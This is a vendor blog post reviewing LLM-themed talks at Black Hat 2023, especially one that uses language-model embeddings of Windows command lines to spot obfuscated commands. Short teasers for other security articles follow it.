Share this
Black Hat 2023 Review: LLMs Everywhere
by David Elkind on Aug 15, 2023 1:12:38 PM
I attended as many Black Hat briefings as possible this year. As a data scientist, I paid particular attention to the data science, machine learning, and artificial intelligence talks. Before we get into details, let’s address the elephant in the room: ChatGPT and LLMs.
Yes, it did seem like every third talk was about trying to apply a large language model (LLM) to either hack or secure a computer. I don’t doubt that the hacker and security communities will continue to extract value from the compressed knowledge stored in large language models, and made available in user-friendly interfaces such as ChatGPT. But the organizations that extract the most value from LLMs will be the ones that are best able to take advantage of these models’ power for interpreting language. One talk in particular did an excellent job of this.
This Year’s Best Application of Large Language Models (LLMs)
In my opinion, the talk that made the best use of a large language model was “IRonMAN: InterpRetable Incident Inspector Based ON Large-Scale Language Model and Association miNing” by Sian-Yao Huang, Cheng-Lin Yang, and Chung-Kuan Chen at CyCraft Technology. The basic idea is to borrow the strength of LLMs in interpreting natural language, and use that interpretive power to create vector representations of Windows command lines.
Natural languages are very flexible, with many ways to express the same information. Likewise, command lines have a certain amount of flexibility. The first kind is obfuscation: There are several equivalent, distinct ways to write the same command. This is important in a security context because these obfuscations can evade detection with tools like regular expressions.
The second source of nuance is that the same string can have different meanings in different contexts. As an example, a user could invoke a command foo
and also pass an argument named foo
to the command; these usages could have the same or distinct meanings. A regular expression would hit on both of those usages, even if our intention is to only capture one of them.
LLMs take (encoded) strings as inputs and yield numerical representations as outputs. The speakers in this talk leverage these numerical outputs, by observing that equivalent command lines tend to be closer to each other than they are to dissimilar command lines, even when obfuscation is used. This gives the model a certain amount of robustness to variations in the input, and allows one to group together command lines from different incidents, facilitating attribution.
I want to emphasize that the main reason this talk is so intriguing to me is that it really leaned on the LLM for the thing that it is best at (interpreting text inputs) and incorporated that utility into a security workflow. Interpreting texts has enormous value for security researchers; using LLMs to do at machine speed what was previously a human-speed task is a big deal.
This talk does not rely on the chat interface at all! Instead, it peeks “under the hood” to work directly with the numerical representations that the model uses to interpret text.
In my humble opinion, the weaker LLM talks focused on the cat-and-mouse aspects of the chatbot interfaces—using ChatGPT to create “black hat” stuff. While the chat interface is impressive, and it can generate some amusing outputs, I don’t see them as a big value-add for security researchers, especially in light of the untrustworthiness of the results. For instance, a recent study found that ChatGPT can generate plausible-but-incorrect answers to Stack Overflow questions 52% of the time. I would expect even worse results if we asked ChatGPT to respond to a security incident.
Looking to the Future
LLMs are a powerful tool, but to truly leverage that power, security researchers will need to think carefully about how to wield that tool. Where are security researchers bottlenecked? Are those bottlenecks related to interpreting large amounts of text? In the security space, I anticipate that LLM methods will find homes in assessing security risks of source code, the code on web pages, and even decompiled binary executable. I hope that we see some of these applications at next year’s Black Hat.
Share this
Categories
- Featured (267)
- Protective DNS (23)
- IT (15)
- IndyCar (9)
- Content Filtering (8)
- AI (7)
- Cybersecurity Brief (7)
- IT Challenges (7)
- Public Wi-Fi (7)
- Deep Dive (6)
- Malware (4)
- Roaming Client (4)
- Team (4)
- Compare (3)
- MSP (3)
- Machine Learning (3)
- Phishing (3)
- Ransomware (3)
- Tech (3)
- Anycast (2)
- Events (2)
- Staying Ahead of Cyber Threats (2)
- Tech Stack (2)
- Secure Web Gateway (1)

Your firewall is working hard… but not smart. And cybercriminals love that.
Like a bouncer at the club with a clipboard—great at stopping the obvious troublemakers that aren’t on the list, but completely oblivious to unknown threats. They excel at blocking unauthorized access through known ports and protocols, but they often overlook a critical vulnerability: DNS traffic and what’s on the other side of a link. This oversight allows cybercrimina...

Introduction: The AI Cybersecurity Arms Race
Artificial intelligence (AI) has transformed the cybersecurity landscape—both for defenders and attackers. While AI-powered cybersecurity solutions offer advanced threat detection, AI-driven cybercrime is evolving at an alarming rate, automating attacks that are more sophisticated, evasive, and dangerous.

Imagine waking up to find your company's most sensitive data exposed, your systems locked, and your reputation in tatters. This nightmare scenario isn't just a hypothetical—it's the reality for businesses falling victim to zero-day attacks. In 2021, four zero-day exploits targeting Microsoft Exchange servers affected over 250,000 organizations worldwide, leaving countless systems vulnerable to data theft and ransomware.